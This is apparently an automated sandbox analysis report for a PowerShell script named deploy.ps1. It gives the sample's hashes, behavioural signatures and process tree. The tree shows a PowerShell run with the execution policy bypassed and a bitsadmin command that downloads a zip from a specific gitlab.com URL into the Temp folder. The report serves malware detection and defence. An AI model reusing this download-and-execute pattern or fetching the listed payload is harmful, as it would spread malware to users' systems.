Analysis
-
max time kernel
838s -
max time network
839s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-01-2025 10:03
Static task
static1
Behavioral task
behavioral1
Sample
deploy.ps1
Resource
win7-20240903-en
windows7-x64
6 signatures
900 seconds
Behavioral task
behavioral2
Sample
deploy.ps1
Resource
win10v2004-20241007-en
windows10-2004-x64
23 signatures
900 seconds
General
-
Target
deploy.ps1
-
Size
8KB
-
MD5
8204fecf61d58baa25cea9e97c894bc3
-
SHA1
bedf0300880e5f5cdd1643abdff6789ee50db35a
-
SHA256
0e284d3446eef106b1557f50bbe83bbeda4557476bb88b89fcc01195db83d4b1
-
SHA512
adc06b854f77734396fefcbc1c319efdb00f30c694a836ce721f5b91364533c410d40c5a07ef68d83d5e5e17c31b074009bc2a2b8823d0c1fd5eb7fbc73c43ea
-
SSDEEP
96:LmbW8Mf47p7qCgr2CpXlwHZt3pXl4Cj+r1osIPjiTYSKYWrrG8cDd:Lmb4f47VHG2tt4osQe4Yg8J
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2940 powershell.exe 6 2940 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2420 bitsadmin.exe -
pid Process 2940 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2940 powershell.exe 2940 powershell.exe 2940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2940 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2940 wrote to memory of 2420 2940 powershell.exe 31 PID 2940 wrote to memory of 2420 2940 powershell.exe 31 PID 2940 wrote to memory of 2420 2940 powershell.exe 31
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\deploy.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer DownloadJob_268532095 /download /priority normal "https://gitlab.com/pnp30/svn/-/raw/main/deps.zip" "C:\Users\Admin\AppData\Local\Temp\deps.zip"2⤵
- Download via BitsAdmin
PID:2420
-